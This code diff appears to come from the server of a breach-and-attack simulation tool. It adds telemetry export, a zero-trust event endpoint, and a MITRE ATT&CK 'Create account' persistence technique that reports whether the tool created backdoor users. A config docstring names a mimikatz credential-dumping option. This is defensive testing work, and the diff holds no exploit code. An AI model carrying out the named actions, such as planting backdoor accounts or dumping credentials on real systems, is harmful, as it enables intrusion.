from monkey_island.cc.models.test_telem import TestTelem
from monkey_island.cc.services.config import ConfigService
TELEM_SAMPLE_DIR = "./telem_sample"
MAX_SAME_CATEGORY_TELEMS = 10000
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
class TestTelemStore:
TELEMS_EXPORTED = False
@staticmethod
def store_test_telem(f):
@wraps(f)
def decorated_function(*args, **kwargs):
if ConfigService.is_test_telem_export_enabled():
time = datetime.now()
method = request.method
content = request.data.decode()
endpoint = request.path
name = str(request.url_rule).replace('/', '_').replace('<', '_').replace('>', '_').replace(':', '_')
TestTelem(name=name, method=method, endpoint=endpoint, content=content, time=time).save()
return f(*args, **kwargs)
return decorated_function
@staticmethod
def export_test_telems():
logger.info(f"Exporting all telemetries to {TELEM_SAMPLE_DIR}")
try:
mkdir(TELEM_SAMPLE_DIR)
except FileExistsError:
logger.info("Deleting all previous telemetries.")
shutil.rmtree(TELEM_SAMPLE_DIR)
mkdir(TELEM_SAMPLE_DIR)
for test_telem in TestTelem.objects():
with open(TestTelemStore.get_unique_file_path_for_test_telem(TELEM_SAMPLE_DIR, test_telem), 'w') as file:
file.write(test_telem.to_json(indent=2))
TestTelemStore.TELEMS_EXPORTED = True
logger.info("Telemetries exported!")
@staticmethod
def get_unique_file_path_for_test_telem(target_dir: str, test_telem: TestTelem):
telem_filename = TestTelemStore._get_filename_by_test_telem(test_telem)
for i in range(MAX_SAME_CATEGORY_TELEMS):
potential_filepath = path.join(target_dir, (telem_filename + str(i)))
if path.exists(potential_filepath):
continue
return potential_filepath
raise Exception(f"Too many telemetries of the same category. Max amount {MAX_SAME_CATEGORY_TELEMS}")
@staticmethod
def _get_filename_by_test_telem(test_telem: TestTelem):
endpoint_part = test_telem.name
return endpoint_part + '_' + test_telem.method
if __name__ == '__main__':
TestTelemStore.export_test_telems()


@ -0,0 +1,12 @@
import flask_restful
import json
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.services.reporting.zero_trust_service import ZeroTrustService
class ZeroTrustFindingEvent(flask_restful.Resource):
@jwt_required()
def get(self, finding_id: str):
return {'events_json': json.dumps(ZeroTrustService.get_events_by_finding(finding_id), default=str)}


@ -120,7 +120,7 @@ class AttackConfig(object):
def set_bool_conf_val(path, val, monkey_config):
"""
Changes monkey's configuration by setting one of its boolean fields value
:param path: Path to boolean value in monkey's configuration. E.g. ['monkey', 'system_info', 'should_use_mimikatz']
:param path: Path to boolean value in monkey's configuration. ['monkey', 'system_info', 'should_use_mimikatz']
:param val: Boolean
:param monkey_config: Monkey's configuration
"""
@ -183,5 +183,5 @@ class AttackConfig(object):
techniques = {}
for type_name, attack_type in list(attack_config.items()):
for key, technique in list(attack_type['properties'].items()):
techniques[key] = {'selected': technique['value'], 'type': SCHEMA['properties'][type_name]['title']}
return techniques


@ -4,6 +4,7 @@ from monkey_island.cc.models import Monkey
from monkey_island.cc.services.attack.technique_reports import T1210, T1197, T1110, T1075, T1003, T1059, T1086, T1082
from monkey_island.cc.services.attack.technique_reports import T1145, T1105, T1065, T1035, T1129, T1106, T1107, T1188
from monkey_island.cc.services.attack.technique_reports import T1090, T1041, T1222, T1005, T1018, T1016, T1021, T1064
from monkey_island.cc.services.attack.technique_reports import T1136
from monkey_island.cc.services.attack.attack_config import AttackConfig
from monkey_island.cc.database import mongo
from monkey_island.cc.services.reporting.report_generation_synchronisation import safe_generate_attack_report
@ -35,7 +36,8 @@ TECHNIQUES = {'T1210': T1210.T1210,
'T1018': T1018.T1018,
'T1016': T1016.T1016,
'T1021': T1021.T1021,
'T1064': T1064.T1064
'T1064': T1064.T1064,
'T1136': T1136.T1136
}
REPORT_NAME = 'new_report'


@ -66,6 +66,22 @@ SCHEMA = {
}
}
},
"persistence": {
"title": "Persistence",
"type": "object",
"link": "https://attack.mitre.org/tactics/TA0003/",
"properties": {
"T1136": {
"title": "Create account",
"type": "bool",
"value": True,
"necessary": False,
"link": "https://attack.mitre.org/techniques/T1136",
"description": "Adversaries with a sufficient level of access "
"may create a local system, domain, or cloud tenant account."
}
}
},
"defence_evasion": {
"title": "Defence evasion",
"type": "object",


@ -0,0 +1,38 @@
from monkey_island.cc.services.attack.technique_reports import AttackTechnique
from monkey_island.cc.services.reporting.report import ReportService
from common.utils.attack_utils import ScanStatus
from common.data.post_breach_consts import POST_BREACH_BACKDOOR_USER, POST_BREACH_COMMUNICATE_AS_NEW_USER
__author__ = "shreyamalviya"
class T1136(AttackTechnique):
tech_id = "T1136"
unscanned_msg = "Monkey didn't try creating a new user on the network's systems."
scanned_msg = "Monkey tried creating a new user on the network's systems, but failed."
used_msg = "Monkey created a new user on the network's systems."
@staticmethod
def get_report_data():
data = {'title': T1136.technique_title()}
scanned_nodes = ReportService.get_scanned()
status = ScanStatus.UNSCANNED.value
for node in scanned_nodes:
if node['pba_results'] != 'None':
for pba in node['pba_results']:
if pba['name'] in [POST_BREACH_BACKDOOR_USER,
POST_BREACH_COMMUNICATE_AS_NEW_USER]:
status = ScanStatus.USED.value if pba['result'][1]\
else ScanStatus.SCANNED.value
data.update({
'info': [{
'machine': {
'hostname': pba['hostname'],
'ips': node['ip_addresses'],
},
'result': ': '.join([pba['name'], pba['result'][0]])
}]
})
data.update(T1136.get_base_data_by_status(status))
return data

Some files were not shown because too many files have changed in this diff.